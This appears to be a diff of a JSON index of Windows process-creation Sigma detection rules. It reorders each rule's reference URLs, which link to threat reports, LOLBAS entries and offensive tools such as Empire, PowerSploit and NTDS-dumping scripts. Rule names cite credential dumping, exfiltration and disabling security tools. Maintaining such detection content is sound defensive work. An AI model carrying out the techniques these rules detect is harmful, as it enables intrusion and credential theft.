"https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" ], "tags": [ @@ -63203,11 +63203,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997", "http://blog.sevagas.com/?Hacking-around-HTA-files", - "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356", "https://twitter.com/mattifestation/status/1326228491302563846", + "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997", + "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_execution.yml" ], "tags": [ @@ -63395,8 +63395,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/harr0ey/status/991670870384021504", "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml", + "https://twitter.com/harr0ey/status/991670870384021504", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_openwith.yml" ], "tags": [ @@ -63429,9 +63429,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", - "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml" ], "tags": [ @@ -63555,9 +63555,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://twitter.com/jonasLyk/status/1555914501802921984", "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml" ], "tags": [ @@ -63590,8 +63590,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml", "https://twitter.com/Moriarty_Meng/status/984380793383370752", + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_input_stream.yml" ], "tags": [ @@ -63998,8 +63998,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit", "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d", + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_secedit.yml" ], "tags": [ @@ -64105,8 +64105,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://twitter.com/_st0pp3r_/status/1583914515996897281", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml" ], @@ -64173,9 +64173,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer", "https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection", "https://www.exploit-db.com/exploits/37525", - "https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml" ], "tags": [ @@ -64331,8 +64331,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1", "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py", + "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powersploit_empire_schtasks.yml" ], "tags": [ @@ -64412,10 +64412,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://twitter.com/cglyer/status/1355171195654709249", "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://twitter.com/cglyer/status/1355171195654709249", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_security_product_uninstall.yml" ], "tags": [ @@ -64512,11 +64512,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services", - "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services", + "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" ], "tags": [ @@ -64653,8 +64653,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Psr/", "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf", + "https://lolbas-project.github.io/lolbas/Binaries/Psr/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psr_capture_screenshots.yml" ], @@ -64703,10 +64703,10 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", - "https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", - "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", + "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trust_discovery.yml" ], "tags": [ @@ -64739,8 +64739,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", + "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ke3chang_regadd.yml" ], "tags": [ @@ -64790,8 +64790,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium_sha1.yml" ], "tags": [ @@ -64877,9 +64877,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://www.poweradmin.com/paexec/", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml" ], "tags": [ @@ -64912,8 +64912,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/1ZRR4H/status/1534259727059787783", "https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/", + "https://twitter.com/1ZRR4H/status/1534259727059787783", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml" ], "tags": [ @@ -65073,9 +65073,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/", - "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/", "https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer", + "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/", + "https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/", "https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_formbook.yml" ], @@ -65109,8 +65109,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", + "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", "https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml" ], @@ -65177,9 +65177,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/_st0pp3r_/status/1583914244344799235", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://twitter.com/_st0pp3r_/status/1583914244344799235", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml" ], "tags": [ @@ -65271,8 +65271,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/Gerenios/AADInternals", "https://o365blog.com/aadinternals/", + "https://github.com/Gerenios/AADInternals", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aadinternals_cmdlets_execution.yml" ], "tags": [ @@ -65299,9 +65299,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_x509enrollment.yml" ], "tags": "No established tags" @@ -65477,8 +65477,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/software/S0404/", "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", + "https://attack.mitre.org/software/S0404/", "https://twitter.com/vxunderground/status/1423336151860002816", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_esentutl_params.yml" ], @@ -65521,8 +65521,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/gN3mes1s/status/1222088214581825540", - "https://twitter.com/gN3mes1s/status/1222095371175911424", "https://twitter.com/gN3mes1s/status/1222095963789111296", + "https://twitter.com/gN3mes1s/status/1222095371175911424", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml" ], "tags": [ @@ -65686,8 +65686,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_reconnaissance.yml" ], "tags": [ @@ -65938,10 +65938,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1", - "https://vms.drweb.fr/virus/?i=24144899", "https://twitter.com/JohnLaTwC/status/1415295021041979392", + "https://vms.drweb.fr/virus/?i=24144899", + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml" ], "tags": [ @@ -65965,8 +65965,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml" ], "tags": [ @@ -66166,8 +66166,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/mattifestation/status/986280382042595328", "https://subt0x11.blogspot.ch/2018/04/wmicexe-whitelisting-bypass-hacking.html", + "https://twitter.com/mattifestation/status/986280382042595328", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bypass_squiblytwo.yml" ], "tags": [ @@ -66285,8 +66285,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shutdown.yml" ], "tags": [ @@ -66393,8 +66393,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", "https://twitter.com/pabraeken/status/993298228840992768", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml" ], @@ -66448,8 +66448,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp", + "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml" ], "tags": [ @@ -66583,8 +66583,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall", + "https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml" ], "tags": [ @@ -66617,10 +66617,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/nas_bench/status/1535322450858233858", "https://twitter.com/CyberRaiju/status/1273597319322058752", - "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/", "https://twitter.com/bohops/status/1276357235954909188?s=12", + "https://twitter.com/nas_bench/status/1535322450858233858", + "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml" ], "tags": [ @@ -66644,10 +66644,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/lefterispan/status/1286259016436514816", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", - "https://twitter.com/jseerden/status/1247985304667066373/photo/1", + "https://twitter.com/lefterispan/status/1286259016436514816", "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", + "https://twitter.com/jseerden/status/1247985304667066373/photo/1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml" ], "tags": [ @@ -66772,8 +66772,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestlab.blog/2020/07/06/indirect-command-execution/", "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", + "https://pentestlab.blog/2020/07/06/indirect-command-execution/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml" ], "tags": [ @@ -66865,11 +66865,11 @@ "logsource.product": "windows", "refs": [ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", - "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", - "https://github.com/zcgonvh/NTDSDumpEx", - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", "https://pentestlab.blog/tag/ntds-dit/", "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", + "https://github.com/zcgonvh/NTDSDumpEx", + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml" ], @@ -66903,9 +66903,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15", "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_sqlcmd.yml" ], "tags": [ @@ -66938,11 +66938,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.cobaltstrike.com/help-opsec", - "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", - "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback", "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool", + "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback", + "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", + "https://www.cobaltstrike.com/help-opsec", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32", "https://twitter.com/CyberRaiju/status/1251492025678983169", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml" @@ -67010,9 +67010,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz", "https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local", "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", + "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz", "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml" ], @@ -67091,8 +67091,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", + "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml" ], "tags": [ @@ -67125,8 +67125,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://securityxploded.com/", "https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/", + "https://securityxploded.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_secutyxploded.yml" ], "tags": [ @@ -67160,9 +67160,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml" ], "tags": [ @@ -67253,8 +67253,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace", "https://lolbas-project.github.io/lolbas/Binaries/Replace/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml" ], "tags": [ @@ -67424,8 +67424,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", "https://www.hvs-consulting.de/lazarus-report/", + "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml" ], "tags": [ @@ -67459,8 +67459,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md", "https://www.joeware.net/freetools/tools/adfind/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md", "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_enumeration.yml" ], @@ -67485,8 +67485,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml" ], "tags": "No established tags" @@ -67574,8 +67574,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", + "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_command.yml" ], "tags": [ @@ -67608,8 +67608,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool", "https://github.com/ch2sh/Jlaive", + "https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_jlaive_batch_execution.yml" ], "tags": [ @@ -67711,9 +67711,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", - "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml" ], "tags": [ @@ -67804,9 +67804,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_hide_sevices.yml" ], "tags": [ @@ -67832,10 +67832,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", - "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", + "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", + 